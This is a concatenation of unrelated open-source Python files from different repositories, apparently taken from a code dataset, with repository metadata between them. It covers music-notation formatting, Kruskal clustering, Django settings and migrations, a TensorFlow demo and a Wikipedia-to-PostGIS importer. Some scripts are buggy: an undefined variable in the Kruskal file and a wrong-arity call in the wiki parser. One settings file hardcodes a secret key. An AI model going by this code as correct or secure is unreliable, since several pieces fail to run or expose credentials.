result = '#{}'.format(result)
elif isinstance(value, schemetools.Scheme):
result = '#{}'.format(result)
return result
@staticmethod
def format_scheme_value(value, force_quotes=False, verbatim=False):
r'''Formats `value` as Scheme would.
.. container:: example
**Example 1.** Some basic values:
::
>>> schemetools.Scheme.format_scheme_value(1)
'1'
::
>>> schemetools.Scheme.format_scheme_value('foo')
'foo'
::
>>> schemetools.Scheme.format_scheme_value('bar baz')
'"bar baz"'
::
>>> schemetools.Scheme.format_scheme_value([1.5, True, False])
'(1.5 #t #f)'
.. container:: example
**Example 2.** Strings without whitespace can be forcibly quoted
via the `force_quotes` keyword:
::
>>> schemetools.Scheme.format_scheme_value(
... 'foo',
... force_quotes=True,
... )
'"foo"'
.. container:: example
**Example 3.** Set verbatim to true to format value exactly (with
only hash preprended):
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> schemetools.Scheme.format_scheme_value(string)
'"(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #\\"noteheads.s0harmonic\\" #}))"'
Returns string.
'''
from abjad.tools import schemetools
if isinstance(value, str) and not verbatim:
value = value.replace('"', r'\"')
if -1 == value.find(' ') and not force_quotes:
return value
return '"{}"'.format(value)
elif isinstance(value, str) and verbatim:
return value
elif isinstance(value, bool):
if value:
return '#t'
return '#f'
elif isinstance(value, (list, tuple)):
return '({})'.format(
' '.join(schemetools.Scheme.format_scheme_value(x)
for x in value))
elif isinstance(value, schemetools.Scheme):
return str(value)
elif isinstance(value, type(None)):
return '#f'
return str(value)
### PUBLIC PROPERTIES ###
@property
def force_quotes(self):
r'''Is true when quotes should be forced in output. Otherwise false.
Returns boolean.
'''
return self._force_quotes
@property
def quoting(self):
r'''Gets Scheme quoting string.
Return string.
'''
return self._quoting
@property
def verbatim(self):
r'''Is true when formatting should format value absolutely verbatim.
Whitespace, quotes and all other parts of value are left in tact.
Defaults to false.
Set to true or false.
Returns true or false.
'''
return self._verbatim | gpl-3.0 | 7,986,514,970,599,183,000 | 29.27762 | 128 | 0.536353 | false | 4.353157 | false | false | false |
manikTharaka/al-go-rithms | greedy/kruskal's_algorithm/python/ArthurFortes/algorithmKruskal.py | 4 | 1445 | """
Computer Science Department (SCC)
Mathematics and Computer Science Institute (ICMC)
University of Sao Paulo (USP)
Algorithms Projects
Teacher: Gustavo Batista
Author: Arthur Fortes da Costa
Method Kruskal
"""
from vertexFunctions import *
from readFile import readFile
from unionFind import unionFind
from operator import itemgetter
def kruskal(nodes, edges, cluster):
forest = unionFind()
mst = []
for n in nodes:
forest.add(n)
sz = len(nodes) - 1
for e in sorted(edges, key=itemgetter(2)):
n1, n2, _ = e
t1 = forest.find(n1)
t2 = forest.find(n2)
if t1 != t2:
mst.append(e)
sz -= 1
if sz == (cluster-1):
return mst
forest.union(t1, t2)
edges = []
nodes = []
edges, nodes, vertex = readFile("base.txt")
result = kruskal(nodes, edges, 7)
buildVertex(vertex)
addNeighbor(result)
ColorVertex()
resp = open("kruskalCut.txt", 'w')
for u in range(len(k)):
resp.write(str(k[u].no)+str("\n"))
resp.write(str("Coordenada: ")+str("(")+str(k[u].dx)+str(", ")+ str(k[u].dy)+str(")")+str("\n"))
resp.write(str("Vizinhos: ")+str(k[u].neighbor)+str("\n"))
resp.write(str("Cor: ")+str(k[u].color)+str("\n"))
resp.write(str("\n"))
resp.close()
dig = open("kruskal.txt", 'w')
for u in range(len(k)):
dig.write(str(k[u].dx)+str("\t")+str(k[u].dy)+str("\t")+str(k[u].color)+str("\n"))
dig.close()
| mit | 5,727,848,772,294,627,000 | 21.578125 | 100 | 0.59654 | false | 2.773512 | false | false | false |
Laendasill/diango_tutorial_test | mysite/settings.py | 1 | 2686 | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p+7p7lv_36$-f+@bw=verpk$o&e(#6@79et^7=819!_1i8vxnp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| mit | 700,184,355,062,771,800 | 25.07767 | 71 | 0.689501 | false | 3.439181 | false | false | false |
mkessy/playlister-project | playlister/playlists/migrations/0004_auto__add_field_group_slug__add_field_playlist_slug__add_field_categor.py | 1 | 5260 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Group.slug'
db.add_column(u'playlists_group', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Playlist.slug'
db.add_column(u'playlists_playlist', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Category.slug'
db.add_column(u'playlists_category', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Group.slug'
db.delete_column(u'playlists_group', 'slug')
# Deleting field 'Playlist.slug'
db.delete_column(u'playlists_playlist', 'slug')
# Deleting field 'Category.slug'
db.delete_column(u'playlists_category', 'slug')
models = {
u'playlists.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'categoryid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Group']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the category'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
},
u'playlists.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groupid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'default': "'Some, key, words'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the group'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'stations': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Playlist']", 'symmetrical': 'False'})
},
u'playlists.playlist': {
'Meta': {'ordering': "['name']", 'object_name': 'Playlist'},
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'creator': ('django.db.models.fields.CharField', [], {'default': "'The creator of the playlist'", 'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "'A description of the playlist'", 'max_length': '200'}),
'featured_artists': ('django.db.models.fields.CharField', [], {'default': "'A, list, of, the artists, formatted, like, this'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the playlist'", 'max_length': '200'}),
'playlistid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'song_count': ('django.db.models.fields.IntegerField', [], {}),
'songs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['songs.Song']", 'symmetrical': 'False'}),
'songza_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'spotify_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'songs.song': {
'Meta': {'ordering': "['title']", 'object_name': 'Song'},
'album': ('django.db.models.fields.CharField', [], {'default': "'Album name'", 'max_length': '200'}),
'artist': ('django.db.models.fields.CharField', [], {'default': "'Artist name'", 'max_length': '200'}),
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'duration': ('django.db.models.fields.IntegerField', [], {}),
'genre': ('django.db.models.fields.CharField', [], {'default': "'Song genre'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'songid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Song title'", 'max_length': '200'})
}
}
complete_apps = ['playlists'] | mit | 6,291,368,834,679,632,000 | 60.894118 | 161 | 0.558935 | false | 3.730496 | false | false | false |
ekcs/congress | congress/tests/datasources/vCenter_fakes.py | 1 | 1093 | # Copyright (c) 2014 Marist SDN Innovation lab Joint with Plexxi Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class MockProperty(object):
def __init__(self, val, name):
self.val = val
self.name = name
class MockDNSInfo(object):
def __init__(self, string):
self.string = string
class MockvCenterHost(dict):
def __init__(self, obj):
self.obj = obj
class MockNicContainer(object):
def __init__(self, nicList):
self.PhysicalNic = nicList
self.HostVirtualNic = nicList
| apache-2.0 | -7,512,709,806,719,100,000 | 29.361111 | 78 | 0.68161 | false | 3.795139 | false | false | false |
MilyangParkJaeHoon/deeplearning | lab5/logistic_regression_diabetes.py | 1 | 1731 | # Lab 5 Logistic Regression Classifier
import tensorflow as tf
import numpy as np
tf.set_random_seed(777) # for reproducibility
xy = np.loadtxt('data-03-diabetes.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, y_data.shape)
# placeholders for a tensor that will be always fed.
X = tf.placeholder(tf.float32, shape=[None, 8])
Y = tf.placeholder(tf.float32, shape=[None, 1])
W = tf.Variable(tf.random_normal([8, 1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# Hypothesis using sigmoid: tf.div(1., 1. + tf.exp(tf.matmul(X, W)))
hypothesis = tf.sigmoid(tf.matmul(X, W) + b)
# cost/loss function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) *
tf.log(1 - hypothesis))
train = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)
# Accuracy computation
# True if hypothesis>0.5 else False
predicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
with tf.Session() as sess:
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(10001):
cost_val, _ = sess.run([cost, train], feed_dict={X: x_data, Y: y_data})
if step % 200 == 0:
print(step, cost_val)
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy],
feed_dict={X: x_data, Y: y_data})
print("\nHypothesis: ", h, "\nCorrect (Y): ", c, "\nAccuracy: ", a)
'''
0 0.82794
200 0.755181
400 0.726355
600 0.705179
800 0.686631
...
9600 0.492056
9800 0.491396
10000 0.490767
...
[ 1.]
[ 1.]
[ 1.]]
Accuracy: 0.762846
'''
| mit | -621,509,392,199,968,800 | 25.630769 | 79 | 0.641248 | false | 2.78744 | false | false | false |
simonwsw/deep-soli | pre/op.py | 1 | 3786 | import os, subprocess
import numpy as np
import h5py
import json
from image import image
class Operation:
def __init__(self):
pass
# generate image for each sequence
def generate_image(self, source, target, num_channel, origin_size=32,
out_size=32, bound=15.0, bin_image='image/bin/image'):
if not os.path.exists(target): os.makedirs(target)
# run flow command
p = subprocess.Popen([bin_image,
'--source', source, '--target', target,
'--channel', str(num_channel),
'--origin', str(origin_size),
'--out', str(out_size),
'--bound', str(bound)])
p.wait()
# generate label file
self._generate_label(source, target)
# load labels
def _generate_label(self, source, target, label_file='label.json'):
with h5py.File(source, 'r') as hf:
labels = [int(l) for l in hf['label'][()]]
# save labels as a dict in json file
labels_dict = {i: l
for i, l in zip(range(len(labels) - 1), labels[1:])}
with open(os.path.join(target, label_file), 'w') as jf:
json.dump(labels_dict, jf)
# delete generated image files
def clean_image(self, file_dir, label_file='label.json'):
print 'Cleaning', file_dir
# delete images in dir
image_files = [os.path.join(file_dir, f)
for f in os.listdir(file_dir)
if os.path.isfile(os.path.join(file_dir, f)) and 'jpg' in f]
for image_file in image_files:
try:
os.remove(image_file)
except Exception, e:
print e
# delete label file
try:
os.remove(os.path.join(file_dir, label_file))
except Exception, e:
print e
# delete dir
try:
os.rmdir(file_dir)
except Exception, e:
print e
# get frame count
def _get_frame_num(self, source, label_file='label.json'):
with open(os.path.join(source, label_file), 'r') as jf:
labels_dict = json.load(jf)
return len(labels_dict)
# setup mean counter and accumulator at the beginning
def setup_mean(self, num_channel, out_size):
self.image_sums = {}
self.count = 0.0
for c in range(num_channel):
self.image_sums['ch%i_image' % (c,)] = \
np.zeros((1, out_size, out_size), dtype='float32')
# accumulate mean for each sequence
def accum_mean(self, source, num_channel, out_size):
print 'Loading mean', source
frame_num = self._get_frame_num(source)
self.count += frame_num
for c in range(num_channel):
for i in range(frame_num):
image_name = os.path.join(source,
'ch%i_%i_image.jpg' % (c, i))
self.image_sums['ch%i_image' % (c,)] += \
image(image_name).load(out_size, out_size)
# save accumulated mean to file
def save_mean(self, mean_file, num_channel):
# store file as hdf5
if mean_file.endswith('h5'):
print 'Save as hdf5'
with h5py.File(mean_file, 'w') as f:
for c in range(num_channel):
f.create_dataset('ch%i_image' % (c,),
data=self.image_sums['ch%i_image' % (c,)]
/ self.count)
# store file as matlab data
elif mean_file.endswith('mat'):
import scipy.io as sio
print 'Save as mat'
data = {}
for c in range(num_channel):
data['ch%i_image' % (c,)] = \
self.image_sums['ch%i_image' % (c,)] / self.count
sio.savemat(mean_file, data)
| mit | -8,486,536,525,631,522,000 | 35.403846 | 73 | 0.53196 | false | 3.640385 | false | false | false |
bigr/map1 | read-wiki/readwiki.py | 1 | 11143 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import xml.etree.cElementTree as xml
import codecs
from string import replace
def parseGeoLocation(geo_cz,geo_dms,geo,coord):
try:
toNumber = lambda s:float(replace(s,u",",u"."))
if geo_cz:
x = geo_cz.split('|')
return (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[3]) + toNumber(x[4])/60.0 + toNumber(x[5])/3600.0)
elif geo_dms:
x = geo_dms.split('|')
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[5]) + toNumber(x[6])/60.0 + toNumber(x[7])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[8]=='W':
ret = (ret[0],-ret[1])
return ret
elif geo:
x = geo.split('|')
x = x[0].split('_')
if x[3] in ['S','N'] and x[7] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[4]) + toNumber(x[5])/60.0 + toNumber(x[6])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[7]=='W':
ret = (ret[0],-ret[1])
return ret
elif x[2] in ['S','N'] and x[5] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0,toNumber(x[3]) + toNumber(x[4])/60.0)
if x[2]=='S':
ret = (-ret[0],ret[1])
if x[5]=='W':
ret = (ret[0],-ret[1])
return ret
elif coord:
pass;
return None;
except:
return None;
sys.stdout=codecs.getwriter('utf-8')(sys.stdout)
source = sys.stdin
context = iter(xml.iterparse(source, events=("start", "end")))
_,root = context.next()
geo_cz_pattern = re.compile(ur"{{(?:g|G)eo cz\|([^}{]+)}}");
geo_dms_pattern = re.compile(ur"{{(?:g|G)eo dms\|([^}{]+)}}");
geo_pattern = re.compile(ur"{{(?:g|G)eo\|([^}{]+)}}");
coord_pattern = re.compile(ur"{{(?:c|C|k|K)oord(?:ynaty)?\|([^}{]+)}}");
category_pattern = re.compile(ur"\[\[(?:k|K)ategorie:([^\]\|]+)(?:\|[^\]]*)?\]\]");
infobox_pattern = re.compile(ur"{{(?:i|I)nfobox[\s-]*([^\|]+)\|[^}]*}}");
#ele_pattern = re.compile(ur"\|/s*vrchol/s*=/s*([0..9]+)");
ele_pattern = re.compile(ur"\| (?:vrchol|kóta) = ([0-9\s]+)");
population_pattern = re.compile(ur"\| (?:obyvatelé) = ([0-9\s\.]+)");
status_pattern = re.compile(ur"\| (?:status) = ([^\s]+)");
name_pattern = re.compile(ur"(?:\|)? (?:název) = (.+)");
print """
DROP TABLE IF EXISTS "wiki";
SELECT DropGeometryColumn('public','wiki', 'way');
CREATE TABLE "wiki" (
"id" BIGINT PRIMARY KEY,
"title" VARCHAR(511),
"name" VARCHAR(511),
"infobox" VARCHAR(127),
"status" VARCHAR(127),
"ele" INT,
"population" INT,
"cats" VARCHAR(1023),
"text_length" INT,
"historic" VARCHAR(127),
"castle_type" VARCHAR(127),
"ruins" INT,
"amenity" VARCHAR(127),
"religion" VARCHAR(63),
"place_of_worship" VARCHAR(63),
"tourism" VARCHAR(63),
"natural" VARCHAR(127),
"nkp" INT,
"kp" INT,
"osm_id" BIGINT
);
SELECT AddGeometryColumn('wiki', 'way', 900913, 'POINT', 2);
"""
page = False
id = 0;
for event, elem in context:
if elem.tag == "{http://www.mediawiki.org/xml/export-0.6/}page":
page = event == 'start'
if event == 'end':
if geo_cz or geo_dms or geo:
cats = ';'.join(categories) if categories else ''
id += 1;
tmp = parseGeoLocation(geo_cz, geo_dms,geo)
if tmp:
print "INSERT INTO wiki (id,way,title,name,infobox,status,ele,population,cats,text_length) VALUES (%(id)s,ST_Transform(ST_SetSRID(ST_MakePoint(%(lon)s,%(lat)s),4326),900913),%(title)s,%(name)s,%(infobox)s,%(status)s,%(ele)s,%(population)s,%(cats)s,%(text_length)s);" % {
'id': id,
'lat': tmp[0],
'lon': tmp[1],
'title': ("'" + replace(title,"'","''") + "'") if title else 'null',
'name': ("'" + replace(name,"'","''") + "'") if name else 'null',
'infobox': ("'" + infobox + "'") if infobox else 'null',
'status': ("'" + replace(status,"'","''") + "'") if status else 'null',
'ele': ("'" + str(ele) + "'") if ele else 'null',
'population': ("'" + str(population) + "'") if population else 'null',
'cats': ("'" + replace(cats,"'","''") + "'") if cats else 'null',
'text_length': ("'" + str(text_length) + "'") if text_length else 'null'
}
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
elif page and event == 'end':
if elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}title':
title = elem.text
elif elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}text':
if elem.text:
text = replace(elem.text,' ',' ')
text_length = len(text)
geo_cz = geo_cz_pattern.search(text)
geo_cz = geo_cz.group(1) if geo_cz else None
geo_dms = geo_dms_pattern.search(text)
geo_dms = geo_dms.group(1) if geo_dms else None
geo = geo_pattern.search(text)
geo = geo.group(1) if geo else None
categories = category_pattern.findall(text)
infobox = infobox_pattern.search(text)
infobox = infobox.group(1).strip() if infobox else None
try:
ele = ele_pattern.search(text)
ele = int(re.sub("[^0-9]",'',ele.group(1))) if ele else None
except:
ele = None
try:
population = population_pattern.search(text)
population = int(re.sub("[^0-9]",'',population.group(1))) if population else None
except:
population = None
status = status_pattern.search(text)
status = status.group(1).strip() if status else None
name = name_pattern.search(text)
name = name.group(1).strip() if name else None
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
if event == 'end':
root.clear()
print """
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.place IN ('city','town','village','hamlet','isolated_dwelling','suburb','neighbourhood')
AND COALESCE(W.name,W.title) = P.name
AND ST_DWithin(W.way,P.way,3000)
AND W.population IS NOT NULL;
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.natural = 'peak'
AND W.infobox = 'hora'
AND (
(ST_DWithin(W.way,P.way,300) AND COALESCE(W.name,W.title) = P.name)
OR (ST_DWithin(W.way,P.way,100) AND (W.name IS NULL OR P.name IS NULL))
OR ST_DWithin(W.way,P.way,30)
);
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('castle','ruins')
AND (
ST_DWithin(W.way,P.way,1000 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek|tvrz','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek|tvrz','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek','','i')))
LIMIT 1
)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Tvrze %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'place_of_worship'
AND (
ST_DWithin(W.way,P.way,300 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i')))
LIMIT 1
)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'theatre'
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,tourism FROM planet_osm_point
UNION SELECT osm_id,name,way,tourism FROM planet_osm_polygon) P
WHERE
P.tourism IN ('museum','gallery')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Muzea %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('memorial','monument')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Pomn_ky a pam_tn_ky %');
UPDATE wiki W
SET "natural" = 'peak'
WHERE W.infobox = 'hora';
UPDATE wiki W
SET
historic = 'castle',
castle_type = (CASE
WHEN W.cats LIKE ('%Hrady %') OR W.cats LIKE ('%Z__ceniny hrad_ %') THEN 'defensive'
WHEN W.cats LIKE ('%Z_mky %') THEN 'stately'
ELSE NULL
END),
ruins = (CASE
WHEN W.cats LIKE ('%Z__ceniny %') THEN 1
ELSE NULL
END)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET
amenity = 'place_of_worship',
religion = (CASE
WHEN W.cats LIKE ('%Me_ity %') THEN 'christian'
WHEN W.cats LIKE ('%Synagogy %') THEN 'jewish'
ELSE 'muslim'
END),
place_of_worship = (CASE
WHEN W.cats LIKE ('%Kaple %') THEN 'chapel'
WHEN W.cats LIKE ('%Kl__tery %') THEN 'monastery'
ELSE 'church'
END)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET amenity = 'theatre'
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET tourism = 'museum'
WHERE
W.cats LIKE ('%Muzeua %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET nkp = 1
WHERE
W.cats LIKE ('%N_rodn_ kulturn_ p_m_tky %');
UPDATE wiki W
SET kp = 1
WHERE
W.cats LIKE ('%Kulturn_ p_m_tky %');
"""
| agpl-3.0 | 8,709,117,120,043,532,000 | 30.204482 | 275 | 0.591741 | false | 2.559155 | false | false | false |
sunoru/pokemon_only | msite/settings_default.py | 1 | 3588 | """
Django settings for Pokemon Only project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR, 'data')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
with open(os.path.join(DATA_DIR, 'secret_key.txt')) as f:
SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'stall',
'tourney',
'pmo2015',
'pmo2016',
'dashboard',
'captcha',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'msite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'templates'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'msite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
